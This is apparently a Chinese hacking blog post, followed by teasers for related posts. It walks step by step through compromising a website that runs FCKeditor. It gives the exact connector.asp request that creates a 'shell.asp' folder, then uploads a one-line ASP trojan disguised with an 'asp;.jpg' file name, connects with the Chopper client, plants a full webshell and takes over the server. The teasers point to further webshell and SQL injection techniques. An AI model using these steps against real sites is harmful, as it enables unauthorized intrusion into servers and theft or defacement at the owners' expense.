找了个添加新闻的地方,点击上传图片→浏览服务器,如下图:
然后新建一个文件夹,命名为 qxz.asp 如下图:
但是被自动命名变成了 qxz_asp 如下图:
下面我们就要用到绕过代码来突破了,代码如下:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
把上面的代码加在网站链接后面,按下回车。如:http://www.xxx.com/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
OK成功
然后关掉此页面,再次点击添加图片 浏览服务器。自动创建了一个 shell.asp 的文件夹
然后把一句话改名为 yjh.asp;.jpg 上传一句话马到此文件夹中。
OK菜刀链接地址 http://www.xxx.com/Upload/image/shell.asp/yjh_asp;.jpg
最后上大马,经过一翻提权战斗,终于拿下了这台服务器,天色不早了,提权过程就不写了。
关于phpweb后台拿shell简单方法。 首先登录后台admin.php 登录后台管理系统后,然后把下面的文件保存为xxx.ht...
坚信许多都了解Sqlmap,可是却不清楚怎样根据sqlmap来引入对不对? 今日将实战演练教大伙儿怎样真实的应用sqlmap来引入?要是了解这12种方式,包你只必须应用Sqlmap这一个专用工具把握...
将大马写到一个txt文件里面,命名为chnlanker.txt 再建一个文本文档,asp的就写入: <!–#include file=”chncto.txt”–>保存为x.asp...
谈Nexpose和 nsightVM的差别前,我先从官方网站(www.rapid7.com)引进一段话: 每日都是出現系统漏洞。你需要持续的智能化来发觉他们,寻找他们,给你的公司区划优先选择顺序,并...
前一段时间,由于程序漏洞造成网页内容多处被挂博彩的内容信息,木马删除后,但是百度收录的挂马页面却都过去几个月了依然还是存在于是利用百度站长平台工具的死链提交将挂马页面删除。下面就为大家分享一下详细的操...
什么叫OpenSSL? 这不是严格意义上来说是一个“黑客工具”,只是一个新项目(称之为“OpenSSL新项目”),致力于将详细的商业服务解决方法融合给网络信息安全专业人员出示安裝安全性套接字层(SS...